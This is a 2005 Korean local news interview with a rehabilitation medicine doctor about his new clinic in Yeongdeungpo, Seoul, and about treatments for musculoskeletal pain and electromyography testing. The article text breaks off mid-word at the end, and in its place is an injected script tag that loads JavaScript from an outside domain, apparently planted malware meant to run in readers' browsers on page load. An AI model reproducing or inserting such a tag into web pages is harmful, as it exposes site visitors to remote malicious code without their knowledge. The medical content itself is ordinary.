EZ EZViwe

정재활의과 원장 정주찬

관리자 기자  2005.10.12 01:53:00

기사프린트

“재활의학 분야의 총체적 관리 시스템도입 체계적인 관리필요”


■ 진료과목 : 재활의학과·정형외과·신경과·신경외과
■ 진료내용 : 허리 목디스크·신경통 관절염·오십견·손발저림·노인병클리닉
               족부클리닉·비만클리닉·통증클리닉·특설물리치료실 

 

정재활의학과는 지난 5월 206클리닉빌딩(당산동3가 206) 3층에 개원하고 재활의학과·정형외과·신경과·신경외과 등의 진료를 하고 있다. 정주찬 원장을 만나 재활의학에 관해 들어 본다. 지역 주민들께 개업인사 한 말씀
 
“안녕하십니까, 당산3가 클리닉빌딩 3층에 관절염, 척추디스크, 근육통, 노인의학, 스포츠손상 등의 전문병원 정재활의학과를 개업하고 진료를 시작한지 4개월여 지났습니다.
그동안 주민여러분께서 높은 관심을 보여주시고 계신데 대해 감사하게 생각합니다. 8년간 축적한 진료 경험을 바탕으로 앞으로도 더욱 친절하고 수준 높은 서비스를 제공하겠습니다.”

재활의학에 대해 구체적으로 설명한다면

 

“재활의학은 다양한 신경, 근육, 골격계 질환의 정밀 진단하에 신체의 기능 회복 및 증진을 위한 재활치료를 실시해 최대의 기능복원으로 최적의 삶의 질 향상을 목적으로 합니다.
물리의학과 재활의학으로 나누어지며 물리의학 분야는 신경, 근육, 골격계 질환으로 인한 급·만성 통증 환자를 대상으로 하는 통증재활치료 영역이자 스포츠 손상 재활치료 영역이며 수술이외의 약물치료를 포함한 보존적 치료를 실시합니다.
재활의학은 더욱 세분화돼 뇌신경·심폐·인지·척수손상·근골격계 등의 통증 재활 분야로 나누어져 각 부분별 증상에 따라 다양한 통증 재활치료를 시행합니다.”

영등포에 개원하게 된 특별한 동기가 있다면

“영등포는 예전에는 공장이 많았던 관계로 신경질환이나 골격계 질환자들이 많았습니다. 현재는 지역적으로 많은 발전을 이루어 공장지대가 대부분 철수하고 환경이 많이 좋아졌지만 전반적인 노령인구의 증가로 재활의학 분야의 필요성이 절실해졌습니다.”
향후 재활의학 분야에 대한 전망은

 “우리 사회의 급속한 노령화로 재활의학의 인식과 수요가 증가하고 있는 것이 현실입니다. 효율적인 대처를 위해 재활의학 분야의 총체적 관리 시스템을 도입해 좀 더 체계적으로 관리해야할 필요가 있습니다.”

<근골격계 통증>
요통, 오십견, 무릎의 퇴행성 관절염, 목 허리 디스크, 좌골신경통, 손발가락관절통 비교적 흔하게 나타나는 질환으로 외상이나 잘못된 자세, 생활습관, 노화, 면역이상에 의한 것 등 통증의 원인이 다양하다.
요통이나 관절통 등 통증성 질환은 1-2주일 정도의 보존적 치료로 완치가 가능하나 잘못된 자세나 생활습관 등이 있는 경우 정확한 진단과 치료를 받는 것이 중요하다.

 

·진단 및 치료
통증이 시작한 시기나 특징, 요인 등에 대한 문진과 여러 가지 이학적 검사를 하고 필요하면 단순 방사선 촬영, 초음파 검사, CT ·MRI 검사, 근전도 검사 등을 통해 통증의 원인이 밝혀지면 증세에 따라 약물요법과 주사요법, 물리치료, 신경차단, 도수치료, 증식치료, 운동치료 등을 하게 된다.
<신경 근전도검사 적응증>
신경근전도검사는 우리 몸의 신경과 근육의 상태를 진단하는 검사이다. 신경근전도검사에는 근전도검사, 신경전도검사, 유발전위검사 등이 있으며 이를 통상 '근전도검사'라 부르고 있다.
이 근전도검사를 통해 신경과 근육에 병이 있는지, 병변이 어느 부위에 있는지 또한 어느 정도로 심한 상태인지 등 그 병의 유무 및 진행여부와 회복여부를 판별할 수 있는 임상적으로 아주 유용한 검사이다. 재활의학과 의사는 신경근전도검사를 통해 신경과 근육의 병을 진단하고 있다.

·진단 및 치료
 * 물리치료 : 급성 만성 통증에 모두 사용될 수 있으며 온열, 냉각, 간섭파, 미세 전류, 저주파를 이용하고 초음파, 레이저를 이용한 치료로 시행된다.
장비의 정확한 선택과 치료방식이 중요하기 때문에 전문적 능력을 갖춘 전문 병원을 찾는 것이 중요하다.

* IMS : 전기침. 캐나다의 군(Gunn) 박사에 의해 시작됐으며 만성 통증 환자와 근육성 통증(담 결림), 신경인성 통증(디스크, 좌골신경통)에 효과적.

* 통증유발점 주사 : 근막통증증후군이라고 하며 단독으로 통증을 일으키기도 하고 다른 질환이 있을 경우 통증을 가중시키는 근골격계의 치료에 가장 효과적.

* 신경차단 : 근골격계에서의 통증은 몸의 경보 시스템 작동으로 생각하면 된다. 따라서 근본적인 병 치료과정이 동반되는 통증치료가 시행돼야 한?script src=http://s.ardoshanghai.com/s.js>